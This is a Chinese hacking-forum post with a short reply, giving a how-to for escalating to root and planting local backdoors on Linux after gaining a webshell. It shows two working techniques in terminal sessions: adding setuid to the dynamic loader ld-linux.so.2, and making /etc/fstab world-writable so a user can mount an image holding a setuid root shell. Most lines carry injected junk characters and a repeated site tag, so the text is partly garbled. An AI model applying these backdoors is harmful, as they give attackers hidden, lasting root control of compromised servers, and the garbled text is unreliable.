中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究) c- R. N$ j/ ^& X, p, p
/ p* C6 s; i( j" B/ y, ~2 G
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
) b% r" z/ L+ Z& q3 v& }1 d2 p7 N# N6 slrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
9 }6 R) T4 ?, W. plrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
: U. g2 x; @1 t' y- @[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究0 z5 v, T, d6 g+ U$ a9 v
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究3 Q- `  N: \, d! K& E
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
4 n3 I7 {& E) o4 B* a. olrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究) i* B$ G  X; Y8 H
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
' S) l0 o. a# _# ^* @我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究; G+ c( h- N( H  v  T1 `' _& S
- V+ Y; M% y# ?! m  T
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究% V4 t) b" W2 B8 _0 d3 y& B! G; O  C

! p" J* r& Z, G- g' J' @6 a[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究4 I* C$ j+ t. x/ @0 q0 g
xiaoyu2ezX-BUG-关注前沿信息安全技术研究9 i1 l0 z, J: d2 l# m
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
. l$ `" L8 y3 l; |( ~6 v5 Vroot2ezX-BUG-关注前沿信息安全技术研究
$ ?3 q4 m$ T' {/ B% v: A[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
6 Z5 P- X4 K; Q1 y% P恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究- M6 N9 L8 d' L

0 N$ C* w$ L7 R- t3 m$ O1 X' ^, Q3 Q方法二:2ezX-BUG-关注前沿信息安全技术研究+ }4 o, U1 i4 F

, u2 r3 x5 S" }. Y- b看过程:2ezX-BUG-关注前沿信息安全技术研究4 U, [! Y' {6 a1 D  u! {+ A
3 P' g; b, b, X: G2 v" {5 V( V
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究! e' p+ H1 ?# _$ u3 X
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
. I2 G% j* s  `$ _0 W
: W& E* {7 R" ^- m6 C; I这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
# L0 D9 w% h9 d; J; n4 B% P& |3 f" K" M8 {' N+ A+ W) m- W
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究" T/ n  T" q  H2 C1 I: D
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
& b( w  B+ T0 j9 M' w[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究5 F1 Y2 T% V9 e0 U2 A* E
9 g9 ]0 j8 B3 f! G
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究7 t: U* J/ g3 v6 q0 p- B* G
* s& F3 \* O0 R8 Q0 b7 @3 T: b  t; T
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究) K3 X5 n4 R% {' I) m
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
6 Z6 v1 E1 g0 L[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究# H: j0 H/ r. ~; |; q6 d2 A
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
* P' P  ?8 `" _, G$ L# r4 |[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究- U1 x+ S) v8 [0 T9 Z. }1 P
total 182ezX-BUG-关注前沿信息安全技术研究
* C; Y) j: b* s6 Udrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究& c! J3 A3 F1 N
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究3 E1 O- C2 N; t' @5 P, \
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究- d) [( I$ C! H3 L
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
# ~: i/ K9 H. |+ s6 n看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究& c- x1 W$ ?6 v8 F$ i# |% T4 f
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
0 u3 f( @; P4 J8 r8 D2 A
$ W  `- B) \9 n貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
& o9 ?1 O0 ]# n3 j$ _5 E2ezX-BUG-关注前沿信息安全技术研究
" |/ C5 u( A4 u1 j( T0 m/ r
( F* u. p; s2 G- e8 j
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2